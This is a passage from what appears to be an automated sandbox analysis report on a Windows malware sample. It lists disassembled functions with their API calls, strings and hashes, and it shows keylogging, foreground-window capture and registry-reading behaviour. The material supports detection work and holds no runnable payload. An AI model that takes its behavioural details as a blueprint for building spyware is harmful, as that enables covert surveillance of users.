                                                                                                                                                                                              • Opcode ID: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                                                                                                                                                              • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                                                                                              Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                              • String ID: @CG$exepath$BG
                                                                                                                                                                                              • API String ID: 4119054056-3221201242
                                                                                                                                                                                              • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                              • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                                                                                              Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                              • String ID: [ $ ]
                                                                                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                                                                                              • Opcode ID: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                                                                                                                                                              • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                                                                                              • Opcode Fuzzy Hash: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                                                                                              Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                              • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                                                                                              Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                              • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                                                                                              Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                              • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                                                                                              Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                                                                                                • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                                                                                                • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                              • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                                                                                              Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                                                                                              • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                              • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                                                                                              Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3919263394-0
                                                                                                                                                                                              • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                              • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                                                                                              Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4116985748-0
                                                                                                                                                                                              • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                              • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                                                                                              Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandleOpenProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 39102293-0
                                                                                                                                                                                              • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                              • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                                                                                              Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                              • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                              • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                                                                                              • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                                                                                              Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                              • String ID: 4[G$4[G
                                                                                                                                                                                              • API String ID: 2931989736-4028565467
                                                                                                                                                                                              • Opcode ID: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                              • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                              • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                                                                                              Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountEventTick
                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                              • API String ID: 180926312-1296849874
                                                                                                                                                                                              • Opcode ID: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                              • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                                                                                              Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                              • String ID: $vD
                                                                                                                                                                                              • API String ID: 1807457897-3636070802
                                                                                                                                                                                              • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                              • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                                                                                              Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                              • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                                                                                              Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                                                                                              • Opcode ID: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                              • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                                                                                              Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                              • API String ID: 481472006-2430845779
                                                                                                                                                                                              • Opcode ID: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                              • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                              Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                                                                                                              • Opcode ID: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                              • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                                                                                              • Opcode Fuzzy Hash: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                                                                                              Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
